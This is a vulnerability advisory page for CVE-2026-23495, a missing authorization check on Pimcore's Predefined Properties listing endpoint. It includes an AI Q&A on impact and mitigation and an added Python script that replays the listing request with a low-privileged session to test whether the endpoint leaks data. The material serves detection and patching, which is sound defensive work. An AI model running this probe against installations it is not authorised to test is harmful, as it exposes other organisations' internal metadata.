CVE-2026-23495
BaseFortify
Publication date: 2026-01-15
Last updated on: 2026-01-15
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Affected versions (upper bound exclusive) |
|---|---|---|
| pimcore | admin_ui_classic_bundle | < 1.7.16 (1.x branch) |
| pimcore | admin_ui_classic_bundle | < 2.2.3 (2.x branch) |
| pimcore | pimcore | < 1.7.15 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-23495 is a Broken Access Control vulnerability (CWE-284) in Pimcore's Admin Classic Bundle. The backend API endpoint that lists Predefined Properties (configurable metadata definitions used across documents, assets, and objects) does not perform a server-side authorization check. As a result, any authenticated backend user, including one that was never granted the property-management permission, can retrieve the full list of Predefined Properties, including their metadata schemas, default values, and configuration details that should only be visible to users holding that permission. [1]
How can this vulnerability impact me?
This vulnerability allows unauthorized backend users to enumerate internal metadata configurations, potentially exposing sensitive business logic, data classification strategies, proprietary keys, or select options. Such exposure can facilitate further attacks like targeted data manipulation or privilege escalation, risking unauthorized changes to asset or object properties. It may also lead to intellectual property leakage and operational inconsistencies within the affected organization. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability poses compliance risks for organizations handling regulated content under standards like GDPR or PCI DSS because unauthorized access to metadata configurations can lead to exposure of sensitive or regulated information. This exposure may result in violations of data protection and privacy requirements, potentially leading to legal and regulatory consequences. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Test it directly: take an account that has backend access but not the property-management permission and have it call the endpoint that lists Predefined Properties. First log in as an admin and capture the request the backend UI sends for that listing (method, path, and the headers it carries, in particular Cookie and X-Pimcore-Csrf-Token); this also serves as a positive control, confirming that the endpoint returns the list for an authorized user. Then log in as the low-privileged user and replay the same request using that user's own session cookie and CSRF token. Do not reuse the admin's tokens for the second request, since that would only prove that the admin is authorized. If the low-privileged request returns the full list, the installation is vulnerable; a fixed version rejects it. curl or Postman is enough to replay the captured request with the captured headers. [1]
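The replay step above, written out as an added example (this is not code from the BaseFortify page or from the Pimcore project). It assumes the operator has already captured the listing URL from the admin UI and supplies it, together with the low-privileged user's own Cookie and X-Pimcore-Csrf-Token values, through environment variables; it also assumes the listing comes back as JSON, either a bare list or an object with a "data" list, which is a guess about the response shape and not taken from the advisory. The sample responses in the block are constructed for illustration.

```python
"""Authorization probe for the Predefined Properties listing endpoint.

Added example, not Pimcore project code. Assumptions (not from the
advisory): PIMCORE_LIST_URL is the listing endpoint captured from the
admin UI, PIMCORE_COOKIE / PIMCORE_CSRF belong to the *low-privileged*
user's own session, and a listing response is JSON (a bare list or an
object with a "data" list).
"""
import json
import os
import sys
import urllib.error
import urllib.request

# Constructed sample responses, used only to illustrate the verdict logic.
SAMPLE_RESPONSES = {
    "leaked":   (200, '{"data":[{"name":"seo_title","type":"text"}],"success":true}'),
    "denied":   (403, '{"success":false,"message":"Forbidden"}'),
    "empty":    (200, '{"data":[]}'),
    "login":    (200, "<html><body>Please log in</body></html>"),
}


def count_entries(body: str):
    """Number of property definitions in a listing body, or None if the
    body is not a recognisable listing (HTML login page, error page, ...)."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return None
    if isinstance(parsed, list):
        return len(parsed)
    if isinstance(parsed, dict) and isinstance(parsed.get("data"), list):
        return len(parsed["data"])
    return None


def assess(status: int, body: str) -> str:
    """Classify a response obtained with the low-privileged user's session.

    'vulnerable'   : 200 and at least one definition came back
    'denied'       : 401/403, the server-side permission check is in place
    'inconclusive' : anything else (empty list, redirect to login, HTML),
                     which needs a manual look rather than a verdict
    """
    if status in (401, 403):
        return "denied"
    if status == 200:
        n = count_entries(body)
        if n is not None and n > 0:
            return "vulnerable"
    return "inconclusive"


def fetch(url: str, cookie: str, csrf_token: str, timeout: float = 10.0):
    """Replay the captured request with the supplied session material.
    Returns (status, body); only the headers the advisory names are sent."""
    req = urllib.request.Request(url, headers={
        "Cookie": cookie,
        "X-Pimcore-Csrf-Token": csrf_token,
        "Accept": "application/json",
    })
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def demo_verdicts() -> dict:
    """Verdicts for the constructed samples (no network access)."""
    return {name: assess(*resp) for name, resp in SAMPLE_RESPONSES.items()}


def main() -> int:
    url = os.environ.get("PIMCORE_LIST_URL")
    cookie = os.environ.get("PIMCORE_COOKIE")
    csrf = os.environ.get("PIMCORE_CSRF")
    if not (url and cookie and csrf):
        print("set PIMCORE_LIST_URL, PIMCORE_COOKIE, PIMCORE_CSRF "
              "(low-privileged user's session); showing sample verdicts:",
              file=sys.stderr)
        for name, verdict in demo_verdicts().items():
            print(f"  {name:8s} -> {verdict}")
        return 2
    status, body = fetch(url, cookie, csrf)
    verdict = assess(status, body)
    print(f"HTTP {status}: {verdict}")
    return 1 if verdict == "vulnerable" else 0


if __name__ == "__main__":
    sys.exit(main())
```

Run it twice: once with the admin's session as a positive control (expect "vulnerable", i.e. a populated list, which simply confirms the endpoint and headers are right), then with the low-privileged user's session. Only the second run is the finding; a 401/403 there means the fix is present, a populated 200 means it is not, and anything else should be inspected by hand rather than trusted as a verdict.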
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation is to upgrade pimcore/admin-ui-classic-bundle to 2.2.3 or later on the 2.x branch, or to 1.7.16 or later on the 1.x branch; these releases add the missing server-side authorization check to the endpoint that lists Predefined Properties, so that only users holding the relevant permission receive the data. Note that adjusting permission settings does not close the gap before the upgrade: the flaw is precisely that the endpoint ignores that permission, so every authenticated backend user can reach it. Until the upgrade is applied, limit backend accounts to trusted users and treat the Predefined Property definitions as visible to all of them. [1, 2, 3, 4]